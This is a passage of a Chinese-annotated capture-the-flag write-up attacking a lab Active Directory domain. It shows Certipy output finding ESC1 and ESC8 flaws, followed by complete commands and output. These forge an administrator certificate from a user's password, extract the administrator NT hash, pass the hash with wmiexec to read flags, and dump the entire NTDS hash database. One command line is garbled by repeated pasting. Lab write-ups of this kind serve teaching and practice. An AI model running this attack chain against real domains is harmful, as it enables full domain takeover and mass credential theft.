[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'xiaorang-XIAORANG-DC-CA'
[*] Checking web enrollment for CA 'xiaorang-XIAORANG-DC-CA' @ 'XIAORANG-DC.xiaorang.lab'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : XIAORANG.LAB\Administrators
Access Rights
ManageCa : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
ManageCertificates : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Enroll : XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-14T04:51:15+00:00
Template Last Modified : 2023-07-14T04:51:44+00:00
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Full Control Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Property Enroll : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
[+] User Enrollable Principals : XIAORANG.LAB\Domain Users
XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
┌──(root㉿kali)-[~]
└─# proxychains -q certipy req -u 'chenchen@xiaorang.lab' -p '@Passw0rd@' -dc-ip '172.22.9.7' -target XIAORANG-DC.xiaorang.lab -ca xiaorang-XIAORANG-DC-CA -template 'XR Manager' -upn 'administrator@xiaorang.lab' -sid 'S-1-5-21-990187620-235975882-534697781-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.404 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@xiaorang.lab'
[*] Certificate object SID is 'S-1-5-21-990187620-235975882-534697781-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
请求域管的TGT
┌──(root㉿kali)-[~]
└─# proxychains -q certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@xiaorang.lab'
[*] SAN URL SID: 'S-1-5-21-990187620-235975882-534697781-500'
[*] Security Extension SID: 'S-1-5-21-990187620-235975882-534697781-500'
[*] Using principal: 'administrator@xiaorang.lab'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80
3.4. PTH
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-wmiexec xiaorang.lab/administrator@172.22.9.7 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
xiaorang\administrator
C:\>type users\administrator\flag\flag04.txt
______ _ ___
/ _____) _ (_)/ __)
| / ____ ____| |_ _| |__ _ _
| | / _ )/ ___) _)| | __) | | |
| \____( (/ /| | | |__| | | | |_| |
\______)____)_| \___)_|_| \__ |
(____/
flag04: flag{b9ed615c-3f78-4e63-b1e2-e63d935189c3}
4. flag04
PTH 过去即可
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-wmiexec xiaorang.lab/administrator@172.22.9.26 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbproxychains -q impacket-wmiexec xiaproxychains -q impacket-wmiexec9.26 -hashes :2f1b57eefb2d152196836b0516a-hashescodec gbk -codec
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type users\administrator\flag\flag03.txt
___ .-.
( ) .-. / \
.--. .--. ___ .-. | |_ ( __) | .`. ; ___ ___
/ \ / \ ( ) \ ( __) (''") | |(___) ( )( )
| .-. ; | .-. ; | ' .-. ; | | | | | |_ | | | |
| |(___) | | | | | / (___) | | ___ | | ( __) | | | |
| | | |/ | | | | |( ) | | | | | ' | |
| | ___ | ' _.' | | | | | | | | | | ' `-' |
| '( ) | .'.-. | | | ' | | | | | | `.__. |
' `-' | ' `-' / | | ' `-' ; | | | | ___ | |
`.__,' `.__.' (___) `.__. (___) (___) ( )' |
; `-' '
.__.'
flag03: flag{1f3702ad-9a15-4e92-98ba-fc9b5a6d6c0e}
C:\>
5. Ntds.dit
┌──(root㉿kali)-[~]
└─# proxychains -q nxc smb 172.22.9.7 -u administrator -H '2f1b57eefb2d152196836b0516abea80' --ntds
SMB 172.22.9.7 445 XIAORANG-DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.9.7 445 XIAORANG-DC [+] xiaorang.lab\administrator:2f1b57eefb2d152196836b0516abea80 (Pwn3d!)
SMB 172.22.9.7 445 XIAORANG-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.22.9.7 445 XIAORANG-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80:::
SMB 172.22.9.7 445 XIAORANG-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.22.9.7 445 XIAORANG-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:40c035732a96dfacc2182ae749338f96:::
SMB 172.22.9.7 445 XIAORANG-DC wanghao:1104:aad3b435b51404eeaad3b435b51404ee:536a226b653bb69266d2eb596580c536:::
SMB 172.22.9.7 445 XIAORANG-DC wangqiang:1105:aad3b435b51404eeaad3b435b51404ee:368340f2b0d5450decd354e80539da1c:::
SMB 172.22.9.7 445 XIAORANG-DC wanglu:1106:aad3b435b51404eeaad3b435b51404ee:baab48b11b012301104e0941fdd6e7f5:::
SMB 172.22.9.7 445 XIAORANG-DC zhangli:1108:aad3b435b51404eeaad3b435b51404ee:7081aa235e5cb12c1faa9b1e7ce3fdd5:::
SMB 172.22.9.7 445 XIAORANG-DC wangning:1109:aad3b435b51404eeaad3b435b51404ee:1c81ac01ed7145d3554f6af29ef0447e:::
SMB 172.22.9.7 445 XIAORANG-DC wangyu:1110:aad3b435b51404eeaad3b435b51404ee:8bdd1fe599eb9a91e2acb4a18b756fc2:::
SMB 172.22.9.7 445 XIAORANG-DC yangli:1111:aad3b435b51404eeaad3b435b51404ee:d1d5fcc11509a654f45b988b40867524:::
SMB 172.22.9.7 445 XIAORANG-DC zhangqian:1112:aad3b435b51404eeaad3b435b51404ee:a5db97821577b2049396706de2841dcf:::
SMB 172.22.9.7 445 XIAORANG-DC lishuai:1113:aad3b435b51404eeaad3b435b51404ee:5774b3b52c93cbaa5269f3fefb84c409:::
SMB 172.22.9.7 445 XIAORANG-DC yangliu:1114:aad3b435b51404eeaad3b435b51404ee:655957c96e325f0c105d5c457b1550bb:::
SMB 172.22.9.7 445 XIAORANG-DC wangying:1115:aad3b435b51404eeaad3b435b51404ee:010535a51d00d807b8939edb78e0be5a:::
SMB 172.22.9.7 445 XIAORANG-DC zhangping:1116:aad3b435b51404eeaad3b435b51404ee:fe9783a99b6766ae23d028fafee9b002:::
SMB 172.22.9.7 445 XIAORANG-DC zhanghui:1117:aad3b435b51404eeaad3b435b51404ee:cc7d1739181d36da817704e0b0332a87:::
SMB 172.22.9.7 445 XIAORANG-DC zhangwen:1118:aad3b435b51404eeaad3b435b51404ee:5e46773822f998483e0cf725f2a7f657:::
SMB 172.22.9.7 445 XIAORANG-DC wangmin:1119:aad3b435b51404eeaad3b435b51404ee:47f628b3a308cd70393a8ffa080b3ca9:::
SMB 172.22.9.7 445 XIAORANG-DC chenlin:1120:aad3b435b51404eeaad3b435b51404ee:49d1e9ee6b6918700620b1f1a01f9598:::
SMB 172.22.9.7 445 XIAORANG-DC chenjuan:1121:aad3b435b51404eeaad3b435b51404ee:8b5ecb1748539ec9988dfbe015231d2b:::
SMB 172.22.9.7 445 XIAORANG-DC wangwei:1123:aad3b435b51404eeaad3b435b51404ee:941ecd52d1e3bf858813ac3d7ab632b5:::
SMB 172.22.9.7 445 XIAORANG-DC zhangnan:1124:aad3b435b51404eeaad3b435b51404ee:fd146fa6b3b0be359ef42f2973eb1ad4:::
SMB 172.22.9.7 445 XIAORANG-DC wangxia:1125:aad3b435b51404eeaad3b435b51404ee:ea33b7f4faa036bf5fa536a4d8eb0734:::
SMB 172.22.9.7 445 XIAORANG-DC zhangyu:1126:aad3b435b51404eeaad3b435b51404ee:b79c222ace13564a6304ca921dca6959:::
SMB 172.22.9.7 445 XIAORANG-DC wangbing:1128:aad3b435b51404eeaad3b435b51404ee:864d42ef4ca9693c9680f617ffe6aa7d:::
SMB 172.22.9.7 445 XIAORANG-DC lilin:1129:aad3b435b51404eeaad3b435b51404ee:c1b1f20789e8ea4671a79546159fb332:::
SMB 172.22.9.7 445 XIAORANG-DC zhangling:1130:aad3b435b51404eeaad3b435b51404ee:ec06d5801ef0a62f22ccc941ee5a3311:::
SMB 172.22.9.7 445 XIAORANG-DC chenling:1131:aad3b435b51404eeaad3b435b51404ee:7ed03849b75db82133c9af80bdf65db8:::
SMB 172.22.9.7 445 XIAORANG-DC liuqiang:1133:aad3b435b51404eeaad3b435b51404ee:e895b2995d9a11742d326f15ef50ac7f:::
SMB 172.22.9.7 445 XIAORANG-DC lihong:1134:aad3b435b51404eeaad3b435b51404ee:77b30a05aa5c5b6b87741d000035c310:::
SMB 172.22.9.7 445 XIAORANG-DC wanghuan:1136:aad3b435b51404eeaad3b435b51404ee:2a8b6205fef32a352635ae40baa28021:::
SMB 172.22.9.7 445 XIAORANG-DC wangxin:1137:aad3b435b51404eeaad3b435b51404ee:86a537bfc1e4dc2e5c3e2f475704fd14:::
SMB 172.22.9.7 445 XIAORANG-DC yangping:1138:aad3b435b51404eeaad3b435b51404ee:a82b755cfcef2db2bb7272d7e6a0ae6b:::
SMB 172.22.9.7 445 XIAORANG-DC lijie:1139:aad3b435b51404eeaad3b435b51404ee:0d2eae11c6ed3a646085645693df04ed:::
SMB 172.22.9.7 445 XIAORANG-DC wangqian:1140:aad3b435b51404eeaad3b435b51404ee:2b2658fc0a6d4cb559de19694c89a508:::
SMB 172.22.9.7 445 XIAORANG-DC liuhui:1142:aad3b435b51404eeaad3b435b51404ee:bb6cfe93746b7353e3957951c8310c8c:::
SMB 172.22.9.7 445 XIAORANG-DC zhangming:1143:aad3b435b51404eeaad3b435b51404ee:7532a8cdf06fab0ee71f25dd8aa744b6:::
SMB 172.22.9.7 445 XIAORANG-DC zhangying:1144:aad3b435b51404eeaad3b435b51404ee:0313dbb865b0f41bd6487a2fc810cf33:::
SMB 172.22.9.7 445 XIAORANG-DC libo:1145:aad3b435b51404eeaad3b435b51404ee:7f7061e58b5c4b7a0e4dbc731391cddd:::
SMB 172.22.9.7 445 XIAORANG-DC liuqin:1146:aad3b435b51404eeaad3b435b51404ee:c2ae7dd4755067457d2b53490b259152:::
SMB 172.22.9.7 445 XIAORANG-DC wangchao:1147:aad3b435b51404eeaad3b435b51404ee:611f5a349902155d5f16d4dd4182fb20:::
SMB 172.22.9.7 445 XIAORANG-DC liuli:1148:aad3b435b51404eeaad3b435b51404ee:cb4ac1d0dd76dc85e18885c9bafd3bd5:::
SMB 172.22.9.7 445 XIAORANG-DC yangwei:1149:aad3b435b51404eeaad3b435b51404ee:9e04232e211ed4b74c6194d1769d0cd8:::
SMB 172.22.9.7 445 XIAORANG-DC wangyan:1150:aad3b435b51404eeaad3b435b51404ee:76ef9da72a8d606848e3e749326f7d08:::
SMB 172.22.9.7 445 XIAORANG-DC wangjian:1151:aad3b435b51404eeaad3b435b51404ee:2917429360236034c859838693b5a6ff:::
SMB 172.22.9.7 445 XIAORANG-DC zhangbin:1152:aad3b435b51404eeaad3b435b51404ee:59a38b87d59621b5b36bd79c09e62887:::
SMB 172.22.9.7 445 XIAORANG-DC wangdan:1154:aad3b435b51404eeaad3b435b51404ee:54bc8e0b93d8781da45968920383a5ad:::
SMB 172.22.9.7 445 XIAORANG-DC liuxia:1155:aad3b435b51404eeaad3b435b51404ee:94d6a2b385b0e08673d029515f4ad039:::
SMB 172.22.9.7 445 XIAORANG-DC zhangrui:1156:aad3b435b51404eeaad3b435b51404ee:ce79dd8e8980366ed989f341d0a7b125:::
SMB 172.22.9.7 445 XIAORANG-DC wangting:1158:aad3b435b51404eeaad3b435b51404ee:cdea5aad2897074715519044cc023532:::
SMB 172.22.9.7 445 XIAORANG-DC zhangjian:1159:aad3b435b51404eeaad3b435b51404ee:d8769b06d2b8e872e0f6df167312f9e8:::
SMB 172.22.9.7 445 XIAORANG-DC liyan:1161:aad3b435b51404eeaad3b435b51404ee:6b63db23c501c5508651ee9c15ad6ed5:::
SMB 172.22.9.7 445 XIAORANG-DC liufeng:1162:aad3b435b51404eeaad3b435b51404ee:2a41e2536e7af935644dcd22c2630291:::
SMB 172.22.9.7 445 XIAORANG-DC zhangbo:1163:aad3b435b51404eeaad3b435b51404ee:59a85126be10dbb3072085e23cd2c60d:::
SMB 172.22.9.7 445 XIAORANG-DC liuming:1164:aad3b435b51404eeaad3b435b51404ee:bc270bb34907f3d4b484b95e0e30945d:::
SMB 172.22.9.7 445 XIAORANG-DC liujia:1165:aad3b435b51404eeaad3b435b51404ee:663208c66f9114a5f1d89ebb3c27adfd:::
SMB 172.22.9.7 445 XIAORANG-DC chentao:1166:aad3b435b51404eeaad3b435b51404ee:70d03e875ba858dd3232b206f2da9835:::
SMB 172.22.9.7 445 XIAORANG-DC zhangting:1167:aad3b435b51404eeaad3b435b51404ee:5cd0c7a1bf8e33a23e8230add6e83320:::
SMB 172.22.9.7 445 XIAORANG-DC liushuai:1168:aad3b435b51404eeaad3b435b51404ee:42cb3f481f4f83c4e7a79235acfacfc0:::
SMB 172.22.9.7 445 XIAORANG-DC lijing:1169:aad3b435b51404eeaad3b435b51404ee:1262543256fc3b6136470cf9d5a2f74e:::
SMB 172.22.9.7 445 XIAORANG-DC wangbin:1170:aad3b435b51404eeaad3b435b51404ee:25597779fca62f939de5d35fd6d27631:::
SMB 172.22.9.7 445 XIAORANG-DC lijian:1171:aad3b435b51404eeaad3b435b51404ee:6e9bddea9e7ad061d26aef6b24fc01bd:::
SMB 172.22.9.7 445 XIAORANG-DC zhouyong:1172:aad3b435b51404eeaad3b435b51404ee:e968c140aba023ee6fd747cc7707bbf6:::
SMB 172.22.9.7 445 XIAORANG-DC liudan:1173:aad3b435b51404eeaad3b435b51404ee:ecc9ff6b75ceb8cedf828e736d7e979a:::
SMB 172.22.9.7 445 XIAORANG-DC yangbin:1174:aad3b435b51404eeaad3b435b51404ee:4ef24666da86ec74d40fe92fbc00d1af:::
SMB 172.22.9.7 445 XIAORANG-DC chenjun:1176:aad3b435b51404eeaad3b435b51404ee:71210b82dd0708fca06dc3863589433a:::
SMB 172.22.9.7 445 XIAORANG-DC wanglei:1177:aad3b435b51404eeaad3b435b51404ee:195625fa400659a5db24b8dfee4c3ca1:::
SMB 172.22.9.7 445 XIAORANG-DC lijun:1178:aad3b435b51404eeaad3b435b51404ee:ebb00f5df0773e09e0e8707d5fa5d7e6:::
SMB 172.22.9.7 445 XIAORANG-DC liuwei:1179:aad3b435b51404eeaad3b435b51404ee:225731cbcb4327482f7cec7e98f4df19:::
SMB 172.22.9.7 445 XIAORANG-DC wanggang:1180:aad3b435b51404eeaad3b435b51404ee:3ece7e302915fe60308f1e8f0ebd7485:::
SMB 172.22.9.7 445 XIAORANG-DC liuping:1181:aad3b435b51404eeaad3b435b51404ee:78cec650414de255a84072cb01289c42:::
SMB 172.22.9.7 445 XIAORANG-DC libing:1183:aad3b435b51404eeaad3b435b51404ee:c821c108d1eb1e6b84331a1ae2846782:::
SMB 172.22.9.7 445 XIAORANG-DC zhangxia:1185:aad3b435b51404eeaad3b435b51404ee:e3d875d1dcebc72365787281b68582d1:::
SMB 172.22.9.7 445 XIAORANG-DC wangling:1188:aad3b435b51404eeaad3b435b51404ee:6888e35373684b9760995756fad43069:::
SMB 172.22.9.7 445 XIAORANG-DC chenli:1192:aad3b435b51404eeaad3b435b51404ee:188aa83b2e5d468c53701ca5b07e0e1b:::
SMB 172.22.9.7 445 XIAORANG-DC chenyan:1193:aad3b435b51404eeaad3b435b51404ee:981fd767eb1a3b88062f2fe303e7fa14:::
SMB 172.22.9.7 445 XIAORANG-DC chenpeng:1194:aad3b435b51404eeaad3b435b51404ee:2a72ecfad32249c65e41e64021a9a6d0:::
SMB 172.22.9.7 445 XIAORANG-DC zhaoyong:1195:aad3b435b51404eeaad3b435b51404ee:6ef750c2034608c0c29b43df323d730b:::
SMB 172.22.9.7 445 XIAORANG-DC lining:1196:aad3b435b51404eeaad3b435b51404ee:aef2dbf12895b828fdd3223bfe30b2d9:::
SMB 172.22.9.7 445 XIAORANG-DC chenchen:1197:aad3b435b51404eeaad3b435b51404ee:97d562214c095a4870ed74ff83c8f9b0:::
SMB 172.22.9.7 445 XIAORANG-DC yangmei:1198:aad3b435b51404eeaad3b435b51404ee:d68a0f1c978f9b4de8b33bb966d953bf:::
SMB 172.22.9.7 445 XIAORANG-DC lilei:1199:aad3b435b51404eeaad3b435b51404ee:e825bb511d6fddb3d1033175f785a902:::
SMB 172.22.9.7 445 XIAORANG-DC liping:1200:aad3b435b51404eeaad3b435b51404ee:ca3151715193bf1daceee3fdfbf3e5d5:::
SMB 172.22.9.7 445 XIAORANG-DC wangli:1201:aad3b435b51404eeaad3b435b51404ee:1d8f0fb0eb5bf5666a5e6a9bd1567514:::
SMB 172.22.9.7 445 XIAORANG-DC wangdong:1202:aad3b435b51404eeaad3b435b51404ee:3a47e95cc33ab8583c535383f3b68df6:::
SMB 172.22.9.7 445 XIAORANG-DC wanghua:1203:aad3b435b51404eeaad3b435b51404ee:4f1b345768fd04fe5bfa01b001574783:::
SMB 172.22.9.7 445 XIAORANG-DC liupeng:1204:aad3b435b51404eeaad3b435b51404ee:d8f2d4876c6433f87381d923b069ef08:::
SMB 172.22.9.7 445 XIAORANG-DC zhangning:1205:aad3b435b51404eeaad3b435b51404ee:17e663f95460fc7a4d39108f4c4c5502:::
SMB 172.22.9.7 445 XIAORANG-DC zhangchao:1206:aad3b435b51404eeaad3b435b51404ee:0cb5fd8a4b804b5ca46a9c5122177876:::
SMB 172.22.9.7 445 XIAORANG-DC limin:1207:aad3b435b51404eeaad3b435b51404ee:ad5f0f764bc054e7a4804860e79e2c0e:::
SMB 172.22.9.7 445 XIAORANG-DC liulei:1208:aad3b435b51404eeaad3b435b51404ee:1d5086758ff0157cc27027e89211fb21:::
SMB 172.22.9.7 445 XIAORANG-DC zhangfei:1209:aad3b435b51404eeaad3b435b51404ee:c8eda9e6cc7bcc341eaa76cf4080e7bb:::
SMB 172.22.9.7 445 XIAORANG-DC chenlong:1210:aad3b435b51404eeaad3b435b51404ee:4e663691796b47243574e64c395595c7:::
SMB 172.22.9.7 445 XIAORANG-DC liufei:1211:aad3b435b51404eeaad3b435b51404ee:f44850ab66abf8e1bd454b8b809d61c2:::
SMB 172.22.9.7 445 XIAORANG-DC XIAORANG-DC$:1000:aad3b435b51404eeaad3b435b51404ee:00158811b26c738f9c8992faceb041da:::
SMB 172.22.9.7 445 XIAORANG-DC DESKTOP-CBKTVMO$:1103:aad3b435b51404eeaad3b435b51404ee:3bda5234d0184eeaddd63b003243382d:::
SMB 172.22.9.7 445 XIAORANG-DC [+] Dumped 96 NTDS hashes to /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds of which 94 were added to the database
SMB 172.22.9.7 445 XIAORANG-DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 172.22.9.7 445 XIAORANG-DC [*] cat /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds | grep -iv disabled | cut -d ':' -f1
SMB 172.22.9.7 445 XIAORANG-DC [*] grep -iv disabled /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds | cut -d ':' -f1